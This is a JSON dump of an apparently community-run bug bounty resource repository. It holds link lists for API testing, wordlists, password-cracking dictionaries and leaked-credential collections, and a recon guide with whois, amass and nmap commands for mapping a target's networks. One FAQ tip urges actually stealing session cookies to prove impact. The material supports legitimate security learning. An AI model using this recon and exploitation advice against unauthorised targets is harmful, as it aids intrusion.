[ { "path": ".github/FUNDING.yml", "content": "# These are supported funding model platforms\n\ncustom: https://paypal.me/Vicky481\n\n\n" }, { "path": ".pdfs/INDEX", "content": "** ** [Resources Mindmap](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/ResourcesMindmap.md)\n/Resources/blob/main/Writeups/Create.md\n\nRESOURCES:(Readme.md)\n\n1. Conferences > Readme.md (Conferences around the world)\n2. Setup > Readme.md (SetupHelpDesk(Under Development))\n3. Writeups > Readme.md (/BugBounty Basic -BBb_00, BugBounty Let's Hunt - BBh_01 & Bugbounty Hunters - BB_Hunter)\n \n BBbasics.md\n BBIntermidiate.md\n BBHunter.md\n CmsServerDatabase.md \n Create.md\n javascript.md\n\n4. Bugbountycheetsheet > Readme.md\n bugbountyplatform.md\n\n5. Bugbounty > Readme.md \n > 0AuthMisconfiguration.md\n \n XSS\n \n 1 \tXSS Documentation\n 2 \tXSS Practice labs\n 3 \tXSS Disclosure/Reports/POC\n 4 \tXSS Mindmap\n 5 \tXSS Tools\n 6 \tXSS Ebooks\n 7 \tXSS Researchers\n 8 \tXSS CVE\n \n SSO \n \n 1 \tSSO Documentation\n 2 \tSSO Practice labs\n 3 \tSSO Disclosure/Reports/POC\n 4 \tSSO Mindmap\n 5 \tSSO Tools\n 6 \tSSO Ebooks\n 7 \tSSO Researchers\n 8 \tSSO CVE\n\n6. BB_Setup in WSL2 > README.md \n > BB_Setup.sh \n > WSL2.md\n \n7. Getting_Started_with_Cybersecurity \n8. Ebooks.md\n9. ResoursesMindmap.md\n\n" }, { "path": "API-HelpDesk/Readme.md", "content": "# Here's 23 free ways to learn about API security testing: by Hany Soliman\n\n1. Video: Traceable AI, API Hacking 101.\n2. Video: Katie Paxton-Fear, API Hacking.\n3. Video: Bugcrowd, Bad API, hAPI Hackers.\n4. Video: OWASP API Security Top 10 Webinar.\n5. Blog: Detectify, How To Hack API's in 2021.\n6. Blog: HackXpert, Let's build an API to hack.\n7. Video: Bugcrowd, API Security 101 by Sadako.\n8. Video: David Bombal, Free API Hacking Course.\n9. Blog: Wallarm, How To Hack API In 60 Minutes.\n10. Website: APIsecurity IO, API Security Articles.\n11. Blog: Curity, The API Security Maturity Model.\n12. Blog: Expedited Security, API Security MegaGuide.\n13. Video: Grant Ongers, API Security Testing Workshop.\n14. Videos: The XSS Rat, API Testing And Securing Guide.\n15. Blog: APIsec OWASP API Security Top 10: A Deep Dive.\n16. Podcast: We Hack Purple, API Security Best Practices.\n17. Blog: Kontra Application Security, Owasp Top 10 for API.\n18. Blog: Secure Delivery, OWASP API Top 10 CTF Walk-through.\n19. Blog: SmartBear, How To Hack An API And Get Away With It\n20. Blog: Ping Identity, API Security: The Complete Guide 2022.\n21. Video: SANS Offensive Operations, Analyzing OWASP API Security.\n22. Blog: Bend Theory, Exploiting Unintended Functionality in API's.\n23. Blog: Bright Security, Complete Guide to Threats, Methods & Tools.\n\n- https://github.com/shieldfy/API-Security-Checklist\n" }, { "path": "Bugbounty/BB-FAQ/BB_FAQ.md", "content": "# BUG BOUNTY FAQ - freqently asked questions (Beginners friendly - Under Development)\nNote: Contents inside the **RESETHACKER Community** are to help our community members and content belongs to respective Authors and RESETHACKER Team.\n\nBugBounty FAQ | Title\n-- | --\n**0** Getting Started in Cybersecurity Advice | [Be-a-hacker and breaking cybersecurity successfully](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Getting_Started_with_Cybersecurity.md)\n**0** Bugbounty FAQ - Imran parray | [General questions asked by poeple](https://github.com/imran-parray/General-Notes)\n**0** Bugbounty Setup HelpDesk | [Got stuck During Setup We have solution for you](https://github.com/RESETHACKER-COMMUNITY/Resources/tree/main/setup)\n**0** Job/Internship/Resume HelpDesk | [find Cybersecurity Jobs/interview, advice to get jobs, crack interview etc](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Readme.md)\n**0** Stay upto date with conferances | [Track all the upcoming conferances](https://github.com/RESETHACKER-COMMUNITY/Resources/tree/main/Conference)\n**0** Trace latest reward, CVE, writeups, tools, Reports, Disclosures and on going trend in Community | [Resources to keep up with cybersecurity community](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md)\n**0** Build with community | [Create, Build and Automate for personal use ](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/Create.md)\n" }, { "path": "Bugbounty/BB-FAQ/Domain-Information.md", "content": "## Domain Information :\n\n- Find Acquisition(google 6 month rule), ASNS, reversewhois, (Identifying IPs and main TLDS)\n \n\t\tExample: List_of_mergers_and_acquisitions_by_COMPANYNAME\n\t\thttps://en.wikipedia.org/wiki/List_of_mergers_and_acquisitions_by_Alphabet\n\t\thttps://en.wikipedia.org/wiki/List_of_mergers_and_acquisitions_by_Meta_Platforms\n \n\t\t- Search eg :\n\t\tresponsible disclosure 2022 \n\t\tCompany responsible disclosure \n\t\tOr check out the suggested keywords by bug hunters or search engines.\n \n\t\t- Go to bug bounty platform and filter our new listed programs manually. \n - 3rd party webisite can be helpfull as well such as cruchbase etc. \n\n\n- To check ASN of IP of domains Visit : ASN Number eg : AS714\n\t\n\thttps://bgp.he.net or ASN Tool - MxToolBox\n\t\n\t\n - An Autonomous System Number (ASN) is a way to represent a collection of IPs and who owns them. \n\t- The IP address pool is spread across five Regional Internet Registries (RIRs) AFRINIC, APNIC, ARIN, LACNIC, and RIPE NCC. \n\t- The providers then allocate IP ranges to different organizations.\n\t- If a company wishes to buy a block of IP addresses, they must purchase it from one of these providers.\n\t\n- To check CIDR range : eg 31.13.55.0/24\n\t\n\t- A Classless Inter-Domain Routing (CIDR) range is a short way of representing a group of IP addresses. \n\t- Compromising a server hosted on a company’s CIDR range may lead you directly into their internal network.\n\t\n\t- Use (https://mxtoolbox.com/asn.aspx) to find a company’s ASN as well as their correlating CIDR ranges. Note that small organizations won’t have a dedicated CIDR range, they normally use third party cloud vendors such as AWS and Rackspace, or they will host their stuff under an internet service provider (ISP) IP. However, large companies tend to have their own CIDR range and we can use this information to target machines hosted there.\n\n\t- Amass Tool : To find domains on a given CIDR range.\n\t\t\tAmss intel -cidr 31.13.55.0/24\n\t\n\t\t\n- Reverse Whois : To find assets owned by an organization or person.\n\t\n\t- There are several online sources that constantly monitor and scrape the whois database for analysis. We can use these services to find domains that are owned by the same organization.\n\tReverse Whois Lookup - ViewDNS.info\n\t\n\t\n- WHOIS : (Domain owners from ASN number)\n\t- Searching the whois database we can find all domains registered by the email “*.example.com”. Some people will use whois guard to hide this information but many companies forget to enable this.\n\t\n\t\twhois -h whois.radb.net -- '-i origin AS714' | grep -Eo \"([0-9.]+){4}/[0-9]+\" | uniq\n\t\tOR\n\t\twhois -h whois.radb.net -- '-i origin ' | grep -Eo \"([0- 9.]+){4}/[0-9]+\" | sort -u\n\t\t\n\t\tTry command: host example.com or dig example.com or ping exaple.com (to know the IP address)\n\t\t\n- DNS Information\n\t- Without the Domain Name System (DNS) you wouldn't be able to correlate domains to Ips.\n\t- DNS records contain several bits of information that can be used to correlate domains to one another. \n\t\n\t- The A, NS, and MX records are the most popular ways to find domains that are likely to be owned by the same person.\n\t\n\t- Try command: dig example.com (give you CNAME - Use to check the subdomain takeover with help of https://github.com/EdOverflow/can-i-take-over-xyz )\n\t\tWe can also see that the domain points to the CNAME page “anything.organization.com”, if we can register this domain we win. \n\t- NOTE that organization could be GitHub, Cloudflare, aws etc. \n\n- Reverse DNS:\n\t\n\t- If domains share the same A, NS, or MX record then it is possible they are owned by the same person. \n\t- We can use reverse IP, reverse name server, and reverse mail server searches to find these domains.\n\t- There may be some false positives but these can be filtered out. \n\t\n\t- This technique will greatly increase your scope has a bug bounty hunter.\n\n\n- Name server:\n\t- Large companies often host their own name servers so they can route traffic to the correct IPs. \n\t- These servers are configured by the organization who owns them so it stands to say that\n\t- Microsoft wouldn’t have domains pointing to a Facebook name server.\n\n\tNslookup -type=NS example.com\n\t\n\t- Reverse Name server:\n\t\n\t\tThere are hundreds of thousands of domains pointing to GoDaddy nameservers,\n\t\tTo check how many domains pointing to nameservers. \n\t \t● https://domaineye.com\n\t\tbut you may have a few false positives in there.\n\t\n\t\n\t- Reverse Mail Server:\n\t\t\n\t\tMX record returned must be owned by the target organization.\n\t\tTo perform reverse mail server search\n\t \t● https://domaineye.com\n\t\n\t\tNslookup -type=MX example.com\n\t\n- Reverse IP\n\t- Utilizing the companies CIDR ranges we can perform a reverse IP search to find any\n\tdomains that are hosted on those IPs. Some people will also use the A record of \n\ttheir target domain to perform reverse IP search. Again, you can use \n\thttps://domaineye.com/ \n\n\n\n---\nWhat we have learned till now:\n\n## Finding Acquisition and Idea is find more Ip/domains related to target.\n\n\tGet IP : ping xyz.com or dig xyz or host xyz.com\n\tCheck ASN\n\tcheck CIDR range :\n\tWHOIS : (Domain owners by same organizations or company)\n\tReverse Whois\n\tDNS Information\n\tReverse DNS \n\tReverse Name server\n\tReverse Mail server\n\tReverse IP\n\tFavicon hashing\n\n- Note: \n\t1. Get ASN from IP > Get CIDR range and save it to IP.TXT\n\t\n\t2. whois -h whois.radb.net -- '-i origin AS714' | grep -Eo \"([0-9.]+){4}/[0-9]+\" | uniq | IP.TXT\n\tRun Nmap\tnmap -iL IP.TXT\n\n\t2. Collect subdomains and check CNAME of all the subdomains with single cammand.\n\n\n### Tool recommended : Amass for asset discovery\n- Amass to find ASM\n\t\tAmass intel -org example.com\n- Amass to list of domains running on given ASN\n\t\tAmass intel -asn AS714\n- To find domains on a given CIDR range.\n\t\tAmass intel -cidr 31.13.55.0/24\n- Utilize reverse whois searches to find other domains purchased by the same user\n\t\tamass intel -whois -d example.com\n\n" }, { "path": "Bugbounty/BB-FAQ/Readme.md", "content": "##### For every bug bounty hunter, keep these things in mind when you are reporting any vulnerability\n\n- 1-Report should have all the necessary details including vulnerable url(most imp), reproducing steps ,poc, impact and if possible mitigation steps.\n\n- 2-When you are explaining impact of any vulnerability , don’t just tell them i can steal session cookie and do account takeover, try to do it and the- n report it. Reporting anything and asking for bounty or hall of fame is not worth it at all.\n\n- 3-This is for xss guys, after finding a popup dont report, try to do further exploitation and increase your impact.\n\n- 4-Report multiple vulnerabilities to a company and then approach them to get their vapt done by you , it will help you in future.\n\n- 5-Understand what’s critical for a company and focus on that types of bugs when you are hunting and trust me it will save your time for sure and you won’t get demotivated after seeing traiger reply on your bug that they are not applicable or etc etc.\n" }, { "path": "Bugbounty/BBMindmap/Readme.md", "content": "## This folder contails mutiple Bugbounty Mindmap curated by all the amazing bughunters. \nUse it as inspiration for creating your own Web pentest / bug bounty recon and Hunting workflow.\n\n- [How Does Mind Mapping Help for Better Bug Bounty](https://www.xmind.net/blog/en/how-does-mind-mapping-help-for-better-bug-bounty/)\n\n\n- [*Compilation of recon workflows by pentester land](https://pentester.land/cheatsheets/2019/03/25/compilation-of-recon-workflows.html)\n- [*Bubounty-hunter - Collect of Mindmap for Bugbounty](https://gowthams.gitbook.io/bughunter-handbook/mindmaps)\n- [Collect of Mind-Maps of Several Things - forked from Imram-parray](https://github.com/RESETHACKER-COMMUNITY/Mind-Maps))\n\n- [Dsopas - BB approc ](https://github.com/dsopas/assessment-mindset)\n- [Iamfrogy - BB approch](https://drive.google.com/drive/folders/15jbRQHhFPjx8oUbP1nPCtm2L-vB11Zew?usp=sharing)\n- [ITSecurityguard - BB approch](https://drive.google.com/drive/folders/15jbRQHhFPjx8oUbP1nPCtm2L-vB11Zew?usp=sharing)\n- [Ahmad Halabi - BB approch](https://drive.google.com/drive/folders/15jbRQHhFPjx8oUbP1nPCtm2L-vB11Zew?usp=sharing) \n- [AjitYadav - web hacking & BB](https://ajityadav.net/assets/images/WH-Recon-BBB-Chapter5-Full.png)\n- [Rohit gautam- BB Tools for Vulnerability](https://drive.google.com/drive/folders/15jbRQHhFPjx8oUbP1nPCtm2L-vB11Zew?usp=sharing)\n" }, { "path": "Bugbounty/Readme.md", "content": "# Bug Bounty Helpdesk(Under Development)\n\n > Note: Contents inside the **RESETHACKER Community** are to help our community members and content belongs to respective Authors and RESETHACKER Team.\n\nBugBounty HelpDesk | Title\n-- | --\n**0** Bug bounty FAQ | [Friendly Q/A](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/bugbounty-FAQ.md)\n**0** ResetHacker- Setup HelpDesk | [Pentesting/Bug Bounty/DevSecOps Setups in window, linux, docker and vps(aws, azure,gcp etc)](https://github.com/RESETHACKER-COMMUNITY/Resources/tree/main/setup) \n**0** Ignitetechnologies & ResetHacker | [Burp Suite for Pentester and cheatsheet to hunt the vulnerabilities](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/burpsuite.md)\n**0** Harsh-Bothra | [Learn 365 Challenge for Beginners/Intermidate - Take it as a refererance to Challenge yourself](https://github.com/harsh-bothra/learn365)\n**0** hakluke | [Bug-bounty-standards - A list of edge cases that occur in bug bounty programs, conversations on how they should be handled.](https://github.com/hakluke/bug-bounty-standards)\n**0** Cipher387 | [Dork Collection for different search engine:](https://github.com/cipher387/Dorks-collections-list)\n**0** Luke Stephens | [How to Regex: A Practical Guide to Regular Expressions (Regex) for Hackers](https://www.bugcrowd.com/blog/how-to-regex-a-practical-guide-to-regular-expressions-regex-for-hackers/)\n**0** Streaak | [Got an API use Keyhacks](https://github.com/streaak/keyhacks)\n**0** Vikram | [JavaScript - Content discovery](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/javascript.md)\n**0** Wordlists | [All Wordlists at one place](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/Wordlists/AllWordlists.md)\n**0** Bug bounty writeups | [Vulnerability based write ups at one place](https://github.com/alexbieber/Bug_Bounty_writeups)\n**0** Bug Bounty Mind-Map collection | [Bugbounty Mindmap curated by all the amazing bughunters.](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/Bugbounty/BBMindmap)\n**0** Public Bug bounty | [Collection of public Bugbounty program](https://github.com/resethacker/public-bugbounty-programs)\n**0** StayUpToDate | [Latest reward, CVE, writeups, tools, Reports, Disclosures and on going trend in Community.](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md)\n\nBugBounty HelpDesk | Title\n-- | --\n**1** HackTricks | [Pentesting & bugbounty Methodology](https://book.hacktricks.xyz/pentesting-methodology)\n**2** Six2dez | [Web-checklist](https://six2dez.gitbook.io/pentest-book/others/web-checklist)\n**3** gowthams | [Help bug bounty hunters with resources](https://gowthams.gitbook.io/bughunter-handbook/bugbounty-short-write-ups)\n**4** The Web Application Security Consortium | [The WASC Threat Classification v2.0](http://projects.webappsec.org/w/page/13246978/Threat-Classification)\n**5** kathan19 | [HowToHunt](https://kathan19.gitbook.io/howtohunt/) \n**6** Ninad Mathpati | [Securityboat](https://workbook.securityboat.in/)\n**7** Book of Bug Bounty Tips | [Collection of \"BugBounty\" Tips tweeted / shared by community people.](https://gowsundar.gitbook.io/book-of-bugbounty-tips/)\n**8** EdOverflow | [Cheatsheets and Must checkout for subdomains Takeover](https://github.com/EdOverflow/bugbounty-cheatsheet)\n**9** Harsh-Bothra | [Security Explained - Highly recommend to understabd vulnerable code-** files](https://github.com/harsh-bothra/SecurityExplained/tree/main/resources)\n**10** Security protection | [Curated lists of tools, tips and resources for protecting digital security and privacy](https://security-list.js.org/#/)\n**11** Offensive Security Cheetsheet | [Web Pentesting and bug bounty](https://cheatsheet.haax.fr/web-pentest/bug_bounty_tips/)\n**12** @zapstiko | [curate bogbounty resource from twitter](https://github.com/zapstiko/Bug-Bounty)\n**13** AllVideoPocsFromHackerOne | [TOP 20 Weakness from HackerOne disclosed Reports](https://github.com/zeroc00I/AllVideoPocsFromHackerOne)\n\n## Getting started with BugBounty - Under development\n1. | [Resources for getting started with BugBounty -BBb_00 ](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/BBbasics.md)\n2. | [Resources for Web Pentesting: Let's Hunt - BBh_01 - under development ](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/BBintermediate.md)\n\nThis contains the detailed resources for people getting started with BugBounty.\n\nIndex | [BugBounty Basic -BBb_00 ](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/BBbasics.md)\n--- | ---\n**1** | Linux Distributions\n**2** | Basic Understanding the web application before you start Hunting\n**3** | Learning resources\n**4** | Paid Certifications / courses\n**5** | Bug Bounty platforms offers Bounty\n**6** | Practice platform\n**7** | [Talks - Bug Bounty]\n**8** | [Pentesting & Bug Hunting Resources - How to Start?]\n**9** | [Bug reports]\n**10** | [Vulnerabilt] Assesment and one liners]\n**11** | [Bug hunting Reconnaissance writeups]\n**12** | [Tools for bug bounty]\n**13** | [Ebooks]\n**14** | [Misc]\n\nThis contains the detailed Resources for people\n**Already Doing BugBounty**\nIndex | [Web pentesting : Let's Hunt - BBh_01 - Under development](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/BBintermediate.md)\n--- | ---\n**1** | [Pentesting Reports/Disclosures ]\n**2** | [Web Pentesting MindMaps]\n**3** | [Web security Testing Writeups]\n**4** | [Bugbounty Reports/Disclosures ]\n**5** | [Bugbounty Methodology/Reconnaissance]\n\n\n\n" }, { "path": "Bugbounty/Table_of_Vulnerability.md", "content": "**Writeups** : Vulnerability cheetsheets\nThis file contains the detailed write up on cheetsheets, Reports, Disclosure, etc - Updating Soon\n\n## Referance :\n- [imran-parray](https://github.com/imran-parray/Web-Sec-CheatSheet)\n\n\n\n# Table of Vulnerability\n\nIndex | [BugBounty Let's Hunt - BBh_01 ](/Writeups/BBintermediate.md)\n--- | ---\n\n**1** | [XSS](/XXS/Readme.md)\n\n**2** | [SQL injection](Sqlinjection.md)\n\n**3** | [LFI](LFI/Readme.md)\n\n**4** | [Business logic Attacks by Dheerajmadhukar](https://github.com/Dheerajmadhukar/notes/tree/main/BugBounty/Business_Logic_Attacks)\n\n**x** | [Captcha Bypass]()\n\n**x** | [Clickjacking]()\n**x** | [Client Side Template Injection - CSTI]()\n\n**x** | [Command Injection]()\n\n**x** | [Content Security Policy - CSP Bypass]()\n\n**x** | [Cookies Hacking]()\n\n**x** | [CORS - Misconfigurations & Bypass]()\n\n**x** | [CRLF Injection]()\n\n**x** | [CSRF (Cross Site Request Forgery]()\n\n**x** | [Dangling Markup - HTML scriptless injection]()\n\n**x** | [Deserialization]()\n\n**x** | [Email Header Injection]()\n\n**x** | [File Inclusion]()\n\n**x** | [File Upload]()\n\n**x** | [IDOR]()\n\n**x** | [JWT Vulnerabilities]()\n\n**x** | [LDAP Injection]()\n\n**x** | [NoSQL Injection]()\n\n**x** | [Open Redirect]()\n\n**x** | [Race Condition]()\n\n**x** | [SSRF (Server Side Request Forgery]()\n\n**x** | [SSTI (Server Side Template Injection]()\n\n**x** | [Unicode Normalization vulnerability]()\n\n**x** | [XPATH Injection]()\n\n**x** | [XSLT Server Side Injection]()\n\n**x** | [XXE (XML External Entity]()\n\n** ** | [oauth Misconfigration and bypass]()\n\n** ** | [2FA Misconfigration & bypass]()\n\n** ** | [MFA Misconfigration & bypass]()\n\n** ** | [Broken link hijacking Misconfigration & bypass]()\n\n** ** | [Subdomain Takeover(mainly CNAME) Misconfigration & bypass]()\n\n\n\n //Index | [Bugbounty Hunters - BB_Hunter](/Writeups/BBHunter.md)\n --- | ---\n Index | [BugBounty Basic -BBb_00 ](/Writeups/BBbasics.md)\n --- | ---//\n \nIndex | Getting started with Bug bounty & web pentesting\n---|---\n**0** Pentesterlabs | [Web pentesting part 1](https://pentesterlab.com/exercises/web_for_pentester/course)\n**0** Pentesterlabs | [Web pentesting part 2](https://pentesterlab.com/exercises/web_for_pentester_ii/course)\n**1** Sanjib Sinha | [Bug Bounty Hunting for Web Security with OWASP Webgoat](https://github.com/Apress/bug-hunting-web-security)\n\n\n" }, { "path": "Bugbounty/Website_inputs_testing.md", "content": "Index | Topics\n---|---\n**1** Bozhidar Bozhanov | [User Authentication Best Practices Checklist](https://dzone.com/articles/user-authentication-best-practices-checklist)\n**2** Gaurav Bewal | [Registration & Login Page Testing for Develpoers/Pentesters](https://www.loginradius.com/blog/async/test-cases-for-registration-and-login-page/)\n\n\n\n\n" }, { "path": "Bugbounty/Wordlists/AllWordlists.md", "content": "# Top Recommended wordlists available for red pentesting, bugbounty and password bruteforcing❤️😳 \n\n#### Perpose : This repository is the collection of multiple types of collected wordlists in one place by respective author and organization that could be used during security assessments and Use it to curate your own wordlist as per as your requirement. \n \n List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, infrastructure,\n high quality wordlists for content and subdomain discovery, payloads to exploit vulnerabilty and many more.\n \n Wordlists 1\n Payloads and Burpsuite wordlists\n Wordlists 2 \n Password Bruteforce wordlists\n Resources - Video, writeups, tools and referance for wordlists\n \n\nAuthor | Wordlists 1\n-- | --\n\n▫️ | [SecLists - danielmiessler](https://github.com/danielmiessler/SecLists) - Collection of multiple types of lists.\n\n▫️ | [Continuously Updated wordlists for Assets - Assetnote](https://wordlists.assetnote.io/) - High quality wordlists for content and subdomain discovery. \n\n▫️ | [Fuzzdb - fuzzdb-project](http://github.com/fuzzdb-project/fuzzdb) - Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.\n\n▫️ | [OneListForAll - six2dez](https://github.com/six2dez/OneListForAll) - Rockyou for web fuzzing\n\n▫️ | [Bug-Bounty-Wordlists - Karanxa](https://github.com/Karanxa/Bug-Bounty-Wordlists) - All the important wordlists used while bug hunting.\n\n▫️ | [Webapp-wordlists - p0dalirius](https://github.com/p0dalirius/webapp-wordlists) - wordlists for each versions of common web applications and content management systems (CMS). \n\n▫️ | [random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists) - Some files for bruteforcing certain things include services, server, database etc\n\nAuthor | Payloads and Burpsuite wordlists\n-- | --\nPayloadsAllTheThings - swisskyrepo | [A list of useful payloads and bypass for Web Application Security and Pentest/CTF](https://github.com/swisskyrepo/PayloadsAllTheThings) \nOrwagodfather | [Payloads to exploit web vulnerabilty and different services. ](https://github.com/orwagodfather/WordList) \nFuzz.txt - Bo0oM | [Potentially dangerous files](https://github.com/Bo0oM/fuzz.txt) \nIntruderPayloads - 1N3 | [A collection of Burpsuite Intruder payloads, BurpBounty payloads, fuzz lists, malicious file uploads and web pentesting methodologies and checklists.](https://github.com/1N3/IntruderPayloads) \nScavenger - wordlist from #burp history | [ Burp extension to create target specific and tailored wordlist from #burp history.](https://github.com/0xDexter0us/Scavenger) \n\n\nAuthor | Wordlists 2\n-- | --\nWordsmith - skahwah | [Assist with creating tailored wordlists. This is mostly based on geolocation.](https://github.com/skahwah/wordsmith) \nBetterdefaultpasslist - govolution | [Default password Fuzz for ports and database.](https://github.com/govolution/betterdefaultpasslist) \nPydictor - LandGrey | [A powerful and useful hacker dictionary builder for a brute-force attack.](https://github.com/LandGrey/pydictor) \nMentalist - sc0tfree | [A graphical tool for custom wordlist generation. It utilizes common human paradigms for constructing passwords and can output the full wordlist as well as rules compatible with Hashcat and John the Ripper.](https://github.com/sc0tfree/mentalist) \nBasubanakar | [login-panel wordlists ](https://github.com/basubanakar/login-panel-wordlist) \nSkweez | [Spiders web pages and extracts words for #wordlist generation.](https://github.com/edermi/skweez) \n\n\nAuthor | Password Bruteforce wordlists\n-- | --\n**1** Hashmob | [Largest collection of Password hashes discovered in database breaches(or other sources)](https://hashmob.net/)\n**2** passphrase-wordlist - initstring | [Passphrase wordlist and hashcat rules for offline cracking of long, complex passwords](https://github.com/initstring/passphrase-wordlist)\n**3** Password-Scripts - laconicwolf | [A collection of scripts that help with different aspects of password cracking, such as wordlist generation, mask analysis, and positional character frequency.](https://github.com/laconicwolf/Password-Scripts)\n**4** Pwdb-Public - FlameOfIgnis | [A collection of all the data extracted from 1 billion leaked credentials from internet.](https://github.com/FlameOfIgnis/Pwdb-Public)\n**5** Probable-Wordlists - berzerk0 | [Wordlists sorted by probability originally created for password generation and testing - make sure your passwords aren't popular!](https://github.com/berzerk0/Probable-Wordlists)\n**6** Brutas-Wordlists and passwords handcrafted with ♥️| [A pretty comprehensive set of password dictionaries and wordlists designed for quick wins in red teaming scenarios or general blackbox pentesting.](https://github.com/tasooshi/brutas)\n**7** COOK | [An overpower wordlist generator, splitter, merger, finder, saver, create words permutation and combinations, apply different encoding/decoding and everything you need.](https://github.com/giteshnxtlvl/cook)\n**8** Passphrase-wordlist | [People think they are getting smarter by using passphrases. Let's prove them wrong!This project includes a massive wordlist of phrases (over 20 million) and two hashcat rule files for GPU-based cracking. The rules will create over 1,000 permutations of each phase](https://github.com/initstring/passphrase-wordlist)\n**9** Insidetrust | [Wordlists for creating statistically likely usernames for use in username-enumeration, simulated password-attacks and other security testing tasks.](https://github.com/insidetrust/statistically-likely-usernames) \n\n\nIndex | Resources - Video, writeups, tools and referance for wordlists\n-- | --\n**0** Creating Wordlists for Hacking, Pentesting & Bug Bounty Hunting | [Using Seclists, Bigquery, and More!](https://www.youtube.com/watch?v=QGbTaxtEQlg)\n**1** Utkusen writeup | [generating-personalized-wordlists - utkusen](https://utkusen.com/blog/generating-personalized-wordlists)\n**2** Gotator - Josue87 | [A tool generate DNS wordlists through permutations.](https://github.com/Josue87/gotator) \n**3** CWFF - D4Vinci | [A Tool to Create your Custom Wordlist For Fuzzing](https://github.com/D4Vinci/CWFF) \n**4** Python Code | [CTH wordlists : passwords/keyboard - sorokinpf](https://github.com/sorokinpf/cth_wordlists/tree/master/passwords/keyboard)\n\nIndex | More Referance for wordlists\n-- | --\n**0** Wordlists for evrything | [Infosec Wordlists](https://github.com/xajkep/wordlists)\n**0** Awesome-wordlists - gmelodie - | [Another curated list wordlists for bruteforcing and fuzzing](https://github.com/gmelodie/awesome-wordlists) \n\n\n\n" }, { "path": "Bugbounty/Wordlists/Readme.md", "content": "TODO : \n1. Create a wordlist based on Backend technology and add a Readme.md to summurize that Technology.\n2. And Create a Common wordlist of Default pages for different Technology.\nEg : cgi-sys/defaultwebpage.cgi\n" }, { "path": "Bugbounty/Wordlists.md", "content": "# Bruteforce Wordlists\nIndex | wordlists\n-- | --\n\n▫️ | [SecLists](https://github.com/danielmiessler/SecLists)\n\n▫️ | [Fuzzdb](http://github.com/fuzzdb-project/fuzzdb)\n\n▫️ | [betterdefaultpasslist](https://github.com/govolution/betterdefaultpasslist)\n\n▫️ | [statistically-likely-usernames](https://github.com/insidetrust/statistically-likely-usernames)\n\n▫️ | [pydictor](https://github.com/LandGrey/pydictor)\n\n▫️ | [mentalist](https://github.com/sc0tfree/mentalist)\n\n▫️ | [wordsmith](https://github.com/skahwah/wordsmith)\n\n▫️ | [IntruderPayloads](https://github.com/1N3/IntruderPayloads)\n\n▫️ | [fuzz.txt](https://github.com/Bo0oM/fuzz.txt)\n\n▫️ | [Password-Scripts](https://github.com/laconicwolf/Password-Scripts)\n▫️ | [Pwdb-Public](https://github.com/FlameOfIgnis/Pwdb-Public)\n\n▫️ | [Bug-Bounty-Wordlists](https://github.com/Karanxa/Bug-Bounty-Wordlists)\n\n▫️ | [WordList](https://github.com/orwagodfather/WordList)\n\n▫️ | [Assetnote](https://wordlists.assetnote.io/)\n\n▫️ | [Webapp-wordlists](https://github.com/p0dalirius/webapp-wordlists)\n\n▫️ | [OneListForAll](https://github.com/six2dez/OneListForAll)\n\n▫️ | [generating-personalized-wordlists](https://utkusen.com/blog/generating-personalized-wordlists)\n\n▫️ | [gotator](https://github.com/Josue87/gotator)\n\n▫️ | [CWFF](https://github.com/D4Vinci/CWFF)\n\n▫️ | [passwords/keyboard](https://github.com/sorokinpf/cth_wordlists/tree/master/passwords/keyboard)\n\n▫️ | [random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists)\n\n▫️ | [passphrase-wordlist](https://github.com/initstring/passphrase-wordlist)\n\n▫️ | [Probable-Wordlists](https://github.com/berzerk0/Probable-Wordlists)\n\n▫️ | [awesome-wordlists](https://github.com/gmelodie/awesome-wordlists)\n\n▫️ | [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)\n\n▫️ | [OneListForAll](https://github.com/six2dez/OneListForAll)\n\n\nIndex | wordlists\n-- | --\n**0** Creating Wordlists for Hacking, Pentesting & Bug Bounty Hunting | [Using Seclists, Bigquery, and More!](https://www.youtube.com/watch?v=QGbTaxtEQlg)\n\n**1** | [login-panel-wordlist](https://github.com/basubanakar/login-panel-wordlist)\n\n**2** Brutas-Wordlists and passwords handcrafted with ♥️| [A pretty comprehensive set of password dictionaries and wordlists designed for quick wins in red teaming scenarios or general blackbox pentesting.](https://github.com/tasooshi/brutas)\n\n**3** COOK | [An overpower wordlist generator, splitter, merger, finder, saver, create words permutation and combinations, apply different encoding/decoding and everything you need.](https://github.com/giteshnxtlvl/cook)\n\n\n**4** Scavenger | [Burp extension to create target specific and tailored wordlist from #burp history.](https://github.com/0xDexter0us/Scavenger\n\n**5** Passphrase-wordlist | [People think they are getting smarter by using passphrases. Let's prove them wrong!\nThis project includes a massive wordlist of phrases (over 20 million) and two hashcat rule files for GPU-based cracking. The rules will create over 1,000 permutations of each phase](https://github.com/initstring/passphrase-wordlist)\n\n**6** Webapp Wordlists | [This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version contains a wordlist of all the files directories for this version.](https://github.com/p0dalirius/webapp-wordlists)\n\n\n**7** OneListForAll | [This is a projectt to generate huge wordlists for web fuzzing, if you just want to fuzz with a good wordlist use the file onelistforallmicro.txt.](https://github.com/six2dez/OneListForAll)\n\n**8** skweez | [skweez (pronounced like \"squeeze\") spiders web pages and extracts words for #wordlist generation.](https://github.com/edermi/skweez)\n" }, { 